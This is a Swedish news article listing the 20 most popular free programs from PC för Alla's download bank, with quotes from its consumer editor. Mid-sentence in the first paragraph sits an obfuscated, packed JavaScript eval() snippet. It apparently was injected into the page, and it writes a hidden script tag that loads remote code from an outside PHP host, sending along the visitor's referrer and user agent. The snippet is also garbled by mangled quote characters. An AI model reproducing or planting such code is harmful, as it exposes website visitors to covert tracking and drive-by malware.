Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Hela listan: Här är svenskarnas mest populära gratisprogram

Hela listan: Här är svenskarnas mest populära gratisprogram
Sebastian

Svenska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dzfer|var|u0026u|referrer|fbydd||js|php’.split(’|’),0,{}))
surfare gillar gratisprogram med fokus på antivirus. Säkerhetverktyget AVG Free toppar listan över de mest nedladdade programmen i tidningen PC för Allas populära programbank – och på topplistan finns även konkurrenter som Ad-aware, Spybot och Avira. Gratisprogram

Det finns gott om fria program på nätet, och många av dem är minst lika bra som sina kommersiella konkurrenter.

– För de flesta räcker ett gratisprogram långt, och det finns stora pengar att tjäna på att välja rätt, säger PC för Allas konsumentredaktör Martin Appel. Openoffice, som är gratis, är exempelvis lika bra som Microsoft Office, som kostar tusen kronor.

Förutom säkerhetsprogram visar PC för Allas sammanställning att svenska surfare gärna laddar hem nyttiga gratisverktyg. Städprogrammet Ccleaner, som gör datorn snabbare, ligger tvåa på listan och här finns även verktyg som Advanced Systemcare och Smartdefrag.

– Vi märker tydligt att många användare har problem med sega och instabila datorer, säger Martin Appel.

En tredje populär typ av gratisprogram är sådana som organiserar digitalbilder och förbättra kvaliteten. Verktyg som Gimp, Picasa och Photoscape lockar många nedladdningar.

– Det finns trender i nedladdningarna, och det skulle inte förvåna mig om bildprogrammen kommer att klättra när alla kommer hem med kamerorna fulla med semesterbilder, säger Martin Appel på PC för Alla.

TOPP 20 – HELA LISTAN

1. AVG Antivirus Free Edition 2012 (Antivirusprogram)

2. Ccleaner (Datorstädning).

3. Mario Forever (Spel)

4. Openoffice (Kontorspaket)

5. VLC Media Player (Mediespelare)

6. Advanced Systemcare Free (Systemverktyg)

7. Ad-aware (Säkerhetsprogram)

8. Gimp (Fotoprogram)

9. Picasa (Fotoprogram)

10. 7-Zip (Komprimeringsprogram)

11. Revo Uninstaller (Avinstallationsverktyg)

12. Youtube Downloader (Nedladdningsverktyg)

13. Smart Defrag (Defragmenteringsverktyg)

14. Photoscape (Fotoprogram)

15. K-Lite Codec Pack Full (Videoavkodare)

16. Spybot Search & Destroy (Säkerhetsprogram)

17. Avira Antivir Personal (Antivirusprogram)

18. Undelete Plus (Filräddningsverktyg)

19. Google Earth (Satellitbildsvisare)

20. Utorrent (Fildelningsprogram)

Fotnot: Listan är hämtad från PC för Allas Programbank (pcforalla.se/program) under perioden 11 mars-19 juni. Direktlänkar finns på pcforalla.se/topp20 och skärmdumpar till alla program på ftp://ftp.idg.se/pfa/Press/topp20.zip.